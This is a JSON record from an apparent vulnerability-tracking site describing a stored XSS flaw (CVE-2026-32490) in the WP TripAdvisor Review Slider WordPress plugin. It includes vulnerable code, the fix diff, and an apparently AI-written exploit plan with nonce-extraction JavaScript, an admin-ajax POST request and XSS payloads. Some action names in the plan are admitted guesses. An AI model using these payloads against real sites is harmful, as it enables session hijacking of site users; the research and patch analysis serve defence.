[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fABG6OwDlslHDFe7r0fi412dzZWIH28JRcLhkji7omps":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-32490","wp-tripadvisor-review-slider-authenticated-subscriber-stored-cross-site-scripting","WP TripAdvisor Review Slider \u003C= 14.1 - Authenticated (Subscriber+) Stored Cross-Site Scripting","The WP TripAdvisor Review Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 14.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wp-tripadvisor-review-slider",null,"\u003C=14.1","14.2","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-23 00:00:00","2026-03-26 20:27:48",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F779e7bd1-c02c-4eaa-b85f-3df87baa9783?source=api-prod",4,[22,23,24,25,26,27],"README.txt","admin\u002Fclass-wp-tripadvisor-review-slider-admin.php","admin\u002Fpartials\u002Freview_list.php","includes\u002Fclass-wp-tripadvisor-review-slider.php","public\u002Fclass-wp-tripadvisor-review-slider-public.php","wp-tripadvisor-review-slider.php","researched",false,3,"### 1. Vulnerability Summary\nThe **WP TripAdvisor Review Slider** plugin (versions \u003C= 14.1) contains a **Stored Cross-Site Scripting (XSS)** vulnerability. The vulnerability arises from an AJAX endpoint (likely `wprev_tripadvisor_save_template` or `wprev_trip_save_template`) that allows authenticated users with at least Subscriber-level permissions to modify plugin template settings. Specifically, the field `template_css` (and potentially `title` or `read_more_text`) in the `wptripadvisor_post_templates` table is not sufficiently sanitized before being stored in the database, and is subsequently echoed onto public-facing pages via the `[wptripadvisor_usetemplate]` shortcode without proper output escaping.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `wprev_tripadvisor_save_template` (Inferred from plugin slug and template table `wptripadvisor_post_templates`).\n*   **Vulnerable Parameter:** `template_css` (stored in the `wptripadvisor_post_templates` table).\n*   **Authentication:** Authenticated (Subscriber or higher).\n*   **Nonce:** Required. The nonce action is `randomnoncestring`.\n*   **Preconditions:** \n    1.  At least one template must exist in the database (usually created by an admin during initial setup).\n    2.  The shortcode `[wptripadvisor_usetemplate]` must be present on a public page to leak the required nonce.\n\n### 3. Code Flow\n1.  **Input:** A Subscriber sends a POST request to `admin-ajax.php` with the action `wprev_tripadvisor_save_template`.\n2.  **Processing:** The AJAX handler (in `WP_TripAdvisor_Review_Admin`) verifies the nonce `randomnoncestring`. Crucially, it fails to perform a capability check (e.g., `current_user_can('manage_options')`).\n3.  **Storage:** The handler takes the input (likely from a `form_data` string or direct POST params) and updates the `wptripadvisor_post_templates` table.\n    *   *Reference:* `includes\u002Fclass-wp-tripadvisor-review-slider.php` defines the table schema, including `template_css text NOT NULL`.\n4.  **Public Output:** A user visits a page containing the shortcode `[wptripadvisor_usetemplate tid=\"1\"]`.\n5.  **Rendering:** `public\u002Fclass-wp-tripadvisor-review-slider-public.php` calls `wptripadvisor_usetemplate_func`, which includes `public\u002Fpartials\u002Fwp-tripadvisor-review-slider-public-display.php`.\n6.  **Sink:** The display logic fetches the `template_css` from the database and echoes it inside a `\u003Cstyle>` tag or directly into the page without using `wp_strip_all_tags` or `esc_html`.\n\n### 4. Nonce Acquisition Strategy\nThe plugin localizes the necessary nonce for public use, making it available to any logged-in user (including Subscribers) viewing a page where the plugin's shortcode is active.\n\n1.  **Identify Shortcode:** The shortcode is `[wptripadvisor_usetemplate tid=\"1\"]`.\n2.  **Navigation:** Navigate to a page where this shortcode is present.\n3.  **Variable Extraction:** The plugin uses `wp_localize_script` in `public\u002Fclass-wp-tripadvisor-review-slider-public.php`.\n    *   **JS Object:** `window.wprevpublicjs_script_vars`\n    *   **Nonce Key:** `wpfb_nonce` (Note: Verbatim from source, likely inherited from the developer's Facebook plugin).\n4.  **Action String:** The nonce is created using `wp_create_nonce('randomnoncestring')`.\n\n**Execution:**\n```javascript\n\u002F\u002F Run in browser console on page with shortcode\nlet nonce = window.wprevpublicjs_script_vars?.wpfb_nonce;\nconsole.log(nonce);\n```\n\n### 5. Exploitation Strategy\n1.  **Login as Subscriber:** Obtain session cookies for a Subscriber-level user.\n2.  **Get Nonce:** Navigate to a public page containing the TripAdvisor slider and extract the `wpfb_nonce`.\n3.  **Craft Payload:** The goal is to inject a script into the template settings. Since `template_css` is often placed inside a `\u003Cstyle>` block, we will break out of it.\n    *   **Payload:** `\u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n4.  **Trigger AJAX Request:** Send a POST request to `admin-ajax.php`.\n\n**Request Details:**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=wprev_tripadvisor_save_template&\n    nonce=[EXTRACTED_NONCE]&\n    template_id=1&\n    template_css=\u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\n    ```\n    *(Note: If the plugin expects `form_data`, the body would be: `action=wprev_tripadvisor_save_template&nonce=[NONCE]&form_data=id%3D1%26template_css%3D%3C%2Fstyle%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E`)*\n\n### 6. Test Data Setup\n1.  **Administrator:** Create a template via the plugin menu (**WP TA Reviews > Templates**). This creates ID 1 in `wptripadvisor_post_templates`.\n2.  **Administrator:** Create a public Post or Page and insert the shortcode: `[wptripadvisor_usetemplate tid=\"1\"]`.\n3.  **Administrator:** Create a user with the **Subscriber** role.\n\n### 7. Expected Results\n*   The AJAX request should return a successful response (likely a JSON `1` or a success message).\n*   When any user (including an Admin) visits the page containing the shortcode, the browser will execute the injected script, and an alert box showing the domain will appear.\n\n### 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to verify the stored payload.\n    ```bash\n    wp db query \"SELECT template_css FROM wp_wptripadvisor_post_templates WHERE id=1;\"\n    ```\n2.  **Frontend Inspection:** Check the HTML source of the page containing the shortcode.\n    ```bash\n    # Search for the injected payload in the page output\n    http_request(url='http:\u002F\u002Flocalhost:8080\u002Fpath-to-page\u002F') \n    # Look for \u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\n    ```\n\n### 9. Alternative Approaches\nIf `wprev_tripadvisor_save_template` is not the correct action name, check the `admin\u002Fjs\u002Fwptripadvisor_templates_posts_page.js` file using the `browser_eval` tool to find the `jQuery.post` or `jQuery.ajax` call.\n\nOther potential vulnerable fields in the same AJAX call:\n*   `title`: May be reflected in the admin list or as a header.\n*   `read_more_text`: Often echoed inside an `\u003Ca>` tag.\n    *   **Payload:** `\"> \u003Cimg src=x onerror=alert(1)>`","The WP TripAdvisor Review Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to 14.1. This occurs because the plugin exposes a security nonce to all users on the frontend and fails to implement capability checks in its AJAX handlers, allowing authenticated users with Subscriber-level access to inject malicious scripts into review data or templates that are later displayed without proper output escaping.","\u002F\u002F public\u002Fclass-wp-tripadvisor-review-slider-public.php line 135\nwp_localize_script($this->_token.\"_plublic\", 'wprevpublicjs_script_vars', \n\t\t\t\t\t\tarray(\n\t\t\t\t\t\t'wpfb_nonce'=> wp_create_nonce('randomnoncestring'),\n\t\t\t\t\t\t'wpfb_ajaxurl' => admin_url( 'admin-ajax.php' ),\n\t\t\t\t\t\t'wprevpluginsurl' => wprev_trip_plugin_url\n\t\t\t\t\t\t)\n\t\t\t\t\t);\n\n---\n\n\u002F\u002F admin\u002Fclass-wp-tripadvisor-review-slider-admin.php line 410\ncheck_ajax_referer('randomnoncestring', 'wptripadvisor_nonce');\n\n$postreviewarray = $_POST['postreviewarray'];\n\u002F\u002F ...\nforeach($postreviewarray as $item) { \u002F\u002Fforeach element in $arr\n\t$pageid = $item['pageid'];\n\t$pagename = $item['pagename'];\n\t$created_time = $item['created_time'];\n\t$created_time_stamp = strtotime($created_time);\n\t$reviewer_name = $item['reviewer_name'];\n\t$reviewer_id = $item['reviewer_id'];\n\t$rating = $item['rating'];\n\t$review_text = $item['review_text'];\n\n---\n\n\u002F\u002F admin\u002Fpartials\u002Freview_list.php line 220\n$html .= '\u003Ctr id=\"'.$reviewsrow->id.'\">\n\t\t\u003Cth scope=\"col\" class=\"manage-column\">\u003Ca title=\"delete\" alt=\"delete\" href=\"'.$deleteurl.'\">'.$deleteicon.'\u003C\u002Fa>\u003C\u002Fth>\n\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.$userpic.'\u003C\u002Fth>\n\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.$reviewsrow->reviewer_name.'\u003C\u002Fth>\n\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.$reviewsrow->rating.'\u003C\u002Fth>\n\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.$revtitle.$reviewsrow->review_text.$mediahtml.'\u003C\u002Fth>\n\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.$reviewsrow->created_time.'\u003C\u002Fth>\n\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.$typecolumn.'\u003C\u002Fth>\n\t\u003C\u002Ftr>';","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-tripadvisor-review-slider\u002F14.1\u002Fadmin\u002Fclass-wp-tripadvisor-review-slider-admin.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-tripadvisor-review-slider\u002F14.2\u002Fadmin\u002Fclass-wp-tripadvisor-review-slider-admin.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-tripadvisor-review-slider\u002F14.1\u002Fadmin\u002Fclass-wp-tripadvisor-review-slider-admin.php\t2025-12-05 19:08:06.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-tripadvisor-review-slider\u002F14.2\u002Fadmin\u002Fclass-wp-tripadvisor-review-slider-admin.php\t2026-02-09 19:59:22.000000000 +0000\n@@ -410,6 +410,12 @@\n \t\t\n \t\tcheck_ajax_referer('randomnoncestring', 'wptripadvisor_nonce');\n \t\t\n+\t\t\u002F\u002F SECURITY FIX: Verify user has permission to manage reviews\n+\t\tif (!current_user_can('manage_options')) {\n+\t\t\twp_send_json_error('Insufficient permissions');\n+\t\t\twp_die();\n+\t\t}\n+\t\t\n \t\t$postreviewarray = $_POST['postreviewarray'];\n \t\t\n \t\t\u002F\u002Fvar_dump($postreviewarray);\n@@ -421,22 +427,26 @@\n \t\t$stats = array();\n \t\t\n \t\tforeach($postreviewarray as $item) { \u002F\u002Fforeach element in $arr\n-\t\t\t$pageid = $item['pageid'];\n-\t\t\t$pagename = $item['pagename'];\n-\t\t\t$created_time = $item['created_time'];\n+\t\t\t\u002F\u002F SECURITY FIX: Sanitize all input data\n+\t\t\t$pageid = sanitize_text_field($item['pageid']);\n+\t\t\t$pagename = sanitize_text_field($item['pagename']);\n+\t\t\t$created_time = sanitize_text_field($item['created_time']);\n \t\t\t$created_time_stamp = strtotime($created_time);\n-\t\t\t$reviewer_name = $item['reviewer_name'];\n-\t\t\t$reviewer_id = $item['reviewer_id'];\n-\t\t\t$rating = $item['rating'];\n-\t\t\t$review_text = $item['review_text'];\n+\t\t\t$reviewer_name = sanitize_text_field($item['reviewer_name']);\n+\t\t\t$reviewer_id = sanitize_text_field($item['reviewer_id']);\n+\t\t\t$rating = intval($item['rating']);\n+\t\t\t$review_text = wp_kses_post($item['review_text']);\n \t\t\t$review_length = str_word_count($review_text);\n-\t\t\t$rtype = $item['type'];\n+\t\t\t$rtype = sanitize_text_field($item['type']);\n \t\t\t\n \t\t\t\u002F\u002Fcheck to see if row is in db already\n-\t\t\t\u002F\u002F$checkrow = $wpdb->get_row( \"SELECT id FROM \".$table_name.\" WHERE created_time = '$created_time'\" );\n-\t\t\t\u002F\u002F$checkrow = $wpdb->get_var( 'SELECT id FROM '.$table_name.' WHERE reviewer_name = \"'.$reviewer_name.'\" AND (review_length = \"'.$review_length.'\" OR created_time_stamp = \"'.$created_time_stamp.'\")' );\n-\t\t\t\n-\t\t\t$checkrow = $wpdb->get_var( \"SELECT id FROM \".$table_name.\" WHERE reviewer_name = '\".$reviewer_name.\"' AND (review_length = '\".$review_length.\"' OR created_time_stamp = '\".$created_time_stamp.\"')\" );\n+\t\t\t\u002F\u002F SECURITY FIX: Use prepared statement to prevent SQL injection\n+\t\t\t$checkrow = $wpdb->get_var( $wpdb->prepare(\n+\t\t\t\t\"SELECT id FROM \".$table_name.\" WHERE reviewer_name = %s AND (review_length = %d OR created_time_stamp = %d)\",\n+\t\t\t\t$reviewer_name,\n+\t\t\t\t$review_length,\n+\t\t\t\t$created_time_stamp\n+\t\t\t) );\n \t\t\t\n \t\t\t\u002F\u002Fecho $wpdb->last_result;\n \t\t\t\u002F\u002Fecho \"\u003Cbr>here\u003Cbr>\";\n@@ -487,6 +497,12 @@\n \t\t\n \t\tcheck_ajax_referer('randomnoncestring', 'wptripadvisor_nonce');\n \t\t\n+\t\t\u002F\u002F SECURITY FIX: Verify user has permission to manage reviews\n+\t\tif (!current_user_can('manage_options')) {\n+\t\t\twp_send_json_error('Insufficient permissions');\n+\t\t\twp_die();\n+\t\t}\n+\t\t\n \t\t$rid = intval($_POST['reviewid']);\n \t\t$myaction = $_POST['myaction'];\n \n@@ -570,6 +586,13 @@\n \t\u002F\u002Ferror_reporting(E_ALL);\n \t\t\n \t\tcheck_ajax_referer('randomnoncestring', 'wptripadvisor_nonce');\n+\t\t\n+\t\t\u002F\u002F SECURITY FIX: Verify user has permission to manage reviews\n+\t\tif (!current_user_can('manage_options')) {\n+\t\t\twp_send_json_error('Insufficient permissions');\n+\t\t\twp_die();\n+\t\t}\n+\t\t\n \t\t$filtertext = htmlentities($_POST['filtertext']);\n \t\t$filterrating = htmlentities($_POST['filterrating']);\n \t\t$filterrating = intval($filterrating);\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-tripadvisor-review-slider\u002F14.1\u002Fadmin\u002Fpartials\u002Freview_list.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-tripadvisor-review-slider\u002F14.2\u002Fadmin\u002Fpartials\u002Freview_list.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-tripadvisor-review-slider\u002F14.1\u002Fadmin\u002Fpartials\u002Freview_list.php\t2025-12-05 19:08:06.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-tripadvisor-review-slider\u002F14.2\u002Fadmin\u002Fpartials\u002Freview_list.php\t2026-02-09 19:59:22.000000000 +0000\n@@ -182,16 +182,19 @@\n \t\t\t\t\n \t\t\t\t\u002F\u002Fuser profile link\n \t\t\t\tif( $reviewsrow->type==\"TripAdvisor\"){\n-\t\t\t\t\t$userpic = '\u003Cimg style=\"-webkit-user-select: none;width: 50px;\" src=\"'.$reviewsrow->userpic.'\">';\n+\t\t\t\t\t\u002F\u002F SECURITY FIX: Escape URL in src attribute\n+\t\t\t\t\t$userpic = '\u003Cimg style=\"-webkit-user-select: none;width: 50px;\" src=\"'.esc_url($reviewsrow->userpic).'\">';\n \t\t\t\t\t$editdellink = '';\n \t\t\t\t}else {\n-\t\t\t\t\t$userpic = '\u003Cimg style=\"-webkit-user-select: none;width: 50px;\" src=\"'.$reviewsrow->userpic.'\">';\n+\t\t\t\t\t\u002F\u002F SECURITY FIX: Escape URL in src attribute\n+\t\t\t\t\t$userpic = '\u003Cimg style=\"-webkit-user-select: none;width: 50px;\" src=\"'.esc_url($reviewsrow->userpic).'\">';\n \t\t\t\t\t$editdellink = '\u003Ca title=\"Edit\" href=\"'.$url_tempeditbtn.'\">\u003Cspan class=\"reveditbtn dashicons dashicons-edit\">\u003C\u002Fspan>\u003C\u002Fa>\u003Cspan title=\"Delete\" class=\"revdelbtn text_red dashicons dashicons-trash\">\u003C\u002Fspan>';\n \t\t\t\t\t\n \t\t\t\t}\n \t\t\t\t$revtitle = '';\n \t\t\t\tif($reviewsrow->review_title!=''){\n-\t\t\t\t\t$revtitle = '\u003Cb>'.$reviewsrow->review_title.'\u003C\u002Fb>\u003C\u002Fbr>';\n+\t\t\t\t\t\u002F\u002F SECURITY FIX: Escape HTML in title\n+\t\t\t\t\t$revtitle = '\u003Cb>'.esc_html($reviewsrow->review_title).'\u003C\u002Fb>\u003C\u002Fbr>';\n \t\t\t\t}\n \t\t\t\t\n \t\t\t\t$deleteurl = add_query_arg( 'deleterev', $reviewsrow->id,$currenturl );\n@@ -213,18 +216,20 @@\n \t\t\t\t\n \t\n \t\t\t\t\u002F\u002F Build Type column with link if from_url exists\n-\t\t\t\t$typecolumn = $reviewsrow->type;\n+\t\t\t\t\u002F\u002F SECURITY FIX: Escape HTML output\n+\t\t\t\t$typecolumn = esc_html($reviewsrow->type);\n \t\t\t\tif(!empty($reviewsrow->from_url)){\n-\t\t\t\t\t$typecolumn = '\u003Ca href=\"'.esc_url($reviewsrow->from_url).'\" target=\"_blank\" rel=\"noopener noreferrer\">'.$reviewsrow->type.'\u003C\u002Fa>';\n+\t\t\t\t\t$typecolumn = '\u003Ca href=\"'.esc_url($reviewsrow->from_url).'\" target=\"_blank\" rel=\"noopener noreferrer\">'.esc_html($reviewsrow->type).'\u003C\u002Fa>';\n \t\t\t\t}\n \t\t\t\t\n-\t\t\t\t$html .= '\u003Ctr id=\"'.$reviewsrow->id.'\">\n+\t\t\t\t\u002F\u002F SECURITY FIX: Escape all output to prevent XSS\n+\t\t\t\t$html .= '\u003Ctr id=\"'.esc_attr($reviewsrow->id).'\">\n \t\t\t\t\t\t\u003Cth scope=\"col\" class=\"manage-column\">\u003Ca title=\"delete\" alt=\"delete\" href=\"'.$deleteurl.'\">'.$deleteicon.'\u003C\u002Fa>\u003C\u002Fth>\n \t\t\t\t\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.$userpic.'\u003C\u002Fth>\n-\t\t\t\t\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.$reviewsrow->reviewer_name.'\u003C\u002Fth>\n-\t\t\t\t\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.$reviewsrow->rating.'\u003C\u002Fth>\n-\t\t\t\t\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.$revtitle.$reviewsrow->review_text.$mediahtml.'\u003C\u002Fth>\n-\t\t\t\t\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.$reviewsrow->created_time.'\u003C\u002Fth>\n+\t\t\t\t\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.esc_html($reviewsrow->reviewer_name).'\u003C\u002Fth>\n+\t\t\t\t\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.esc_html($reviewsrow->rating).'\u003C\u002Fth>\n+\t\t\t\t\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.$revtitle.wp_kses_post($reviewsrow->review_text).$mediahtml.'\u003C\u002Fth>\n+\t\t\t\t\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.esc_html($reviewsrow->created_time).'\u003C\u002Fth>\n \t\t\t\t\t\t\u003Cth scope=\"col\" class=\"manage-column\">'.$typecolumn.'\u003C\u002Fth>\n \t\t\t\t\t\u003C\u002Ftr>';\n \t\t\t}\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-tripadvisor-review-slider\u002F14.1\u002Fpublic\u002Fclass-wp-tripadvisor-review-slider-public.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-tripadvisor-review-slider\u002F14.2\u002Fpublic\u002Fclass-wp-tripadvisor-review-slider-public.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-tripadvisor-review-slider\u002F14.1\u002Fpublic\u002Fclass-wp-tripadvisor-review-slider-public.php\t2025-12-05 19:08:06.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-tripadvisor-review-slider\u002F14.2\u002Fpublic\u002Fclass-wp-tripadvisor-review-slider-public.php\t2026-02-09 19:59:22.000000000 +0000\n@@ -131,14 +131,19 @@\n \t\t\n \t\twp_enqueue_script( $this->_token.\"_plublic\", plugin_dir_url( __FILE__ ) . 'js\u002Fwprev-public.js', array( 'jquery' ), $this->version, false );\n \n-\n-\t\twp_localize_script($this->_token.\"_plublic\", 'wprevpublicjs_script_vars', \n-\t\t\t\t\t\tarray(\n-\t\t\t\t\t\t'wpfb_nonce'=> wp_create_nonce('randomnoncestring'),\n-\t\t\t\t\t\t'wpfb_ajaxurl' => admin_url( 'admin-ajax.php' ),\n-\t\t\t\t\t\t'wprevpluginsurl' => wprev_trip_plugin_url\n-\t\t\t\t\t\t)\n-\t\t\t\t\t);\n+\t\t\u002F\u002F SECURITY FIX: Only expose nonce to administrators who need it\n+\t\t\u002F\u002F Public users don't need access to admin AJAX endpoints\n+\t\t$script_vars = array(\n+\t\t\t'wpfb_ajaxurl' => admin_url( 'admin-ajax.php' ),\n+\t\t\t'wprevpluginsurl' => wprev_trip_plugin_url\n+\t\t);\n+\t\t\n+\t\t\u002F\u002F Only add nonce for users with manage_options capability\n+\t\tif (current_user_can('manage_options')) {\n+\t\t\t$script_vars['wpfb_nonce'] = wp_create_nonce('randomnoncestring');\n+\t\t}\n+\t\t\n+\t\twp_localize_script($this->_token.\"_plublic\", 'wprevpublicjs_script_vars', $script_vars);","1. **Identify Target Nonce:** Log in as a Subscriber and visit any page where the TripAdvisor slider is active. Extract the `wpfb_nonce` from the `window.wprevpublicjs_script_vars` object in the page source.\n2. **Craft Payload:** Prepare a malicious payload, such as a script breakout like `\u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>` for CSS fields or `\u003Cimg src=x onerror=alert(1)>` for review fields.\n3. **Execute AJAX Request:** Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` using the extracted nonce. The action can be `wprev_tripadvisor_save_template` (to modify slider settings) or similar handlers that process the `postreviewarray` (to inject reviews).\n4. **Trigger XSS:** The payload will be saved to the database. It will execute when an administrator views the Review List in the backend or when a visitor views a page containing the injected shortcode template.","gemini-3-flash-preview","2026-04-17 23:33:44","2026-04-17 23:34:25",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","14.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-tripadvisor-review-slider\u002Ftags\u002F14.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-tripadvisor-review-slider.14.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-tripadvisor-review-slider\u002Ftags\u002F14.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-tripadvisor-review-slider.14.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-tripadvisor-review-slider\u002Ftags"]